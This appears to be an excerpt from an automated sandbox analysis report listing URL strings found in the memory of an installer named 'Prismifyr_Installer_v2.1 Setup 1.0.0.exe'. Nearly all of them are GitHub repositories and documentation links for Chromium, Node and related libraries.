Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://datatracker.ietf.org/doc/draft-ietf-rtcweb-ip-handling.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.apple.com/download/more/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.chrome.com/blog/enabling-shared-array-buffer/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.chrome.com/blog/immutable-document-domain/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/service_workers/events/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/service_workers/events/Script
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#The_
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://developers.google.com/android/guides/setup
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/2/library/subprocess.html:
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/2/library/tempfile.html#tempfile.mkstemp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://download.developer.apple.com/Developer_Tools/Command_Line_Tools_for_Xcode_11.5/Command_Line_
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://example.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://example.orgExpired
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gist.github.com/erichocean/5177582
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/BatikhSouri/node-cryptopp/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/DennisOSRM/node-osrm)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/GoogleChrome/web-vitals
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/LearnBoost/node-canvas/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Maratyszcza/pthreadpool
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/NickNaso/ghostscript4js/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/NickNaso/magick-cli/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Nicoshev/rapidhash
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Nicoshev/rapidhash/blob/master/rapidhash.h
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/PortAudio/portaudio/tree/master/src/common
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/ReactiveX/rxjs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/ReklatsMasters/node-process-list/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/TooTallNate/node-socks-proxy-agent#readme
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/TooTallNate/node-time/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/TooTallNate/node-weak/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/TooTallNate/ref/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.border-boxcontent-bo
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WICG/scheduling-apis
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WICG/shared-element-transitions/blob/main/debugging_overflow_on_images.md.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WICG/view-transitions/blob/main/debugging_overflow_on_images.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WebAssembly/wasm-c-api/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/XadillaX/aliyun-ons/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/XadillaX/thmclrx/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/aawc/unrar.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/adaltas/node-krb5/blob/master/binding.gyp)#
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/andrewrk/node-mv/blob/master/package.json
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/astro/node-expat/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/astro/node-expat/blob/master/deps/libexpat/libexpat.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/bitinn/node-fetch
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/bnoordhuis/node-buffertools/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/bolgovr/node-ip2location/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/brailcom/speechd
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/c4milo/node-fann/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/c4milo/node-inotify/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/c4milo/v8-profiler/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/chalk/supports-color
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/chjj/pty.js/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/creationix/topcube/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/developmentseed/node-sqlite3/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/developmentseed/node-sqlite3/blob/master/deps/sqlite3.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/dpranke/typ.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/etingof/pyasn1
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/distributed_point_functions
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/pprof/tree/master/proto
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/private-join-and-compute
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/protobuf
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/re2
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/ruy
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/securemessage
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/sentencepiece
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/shell-encryption
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/ukey2
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/iarna/unique-filename
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/iarna/unique-filename.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/inspect-js/is-date-object/blob/main/index.js#L3-L11
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/intel/libva
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/isaacs/color-support.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/isaacs/minipass-fetch)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/isaacs/minipass.git
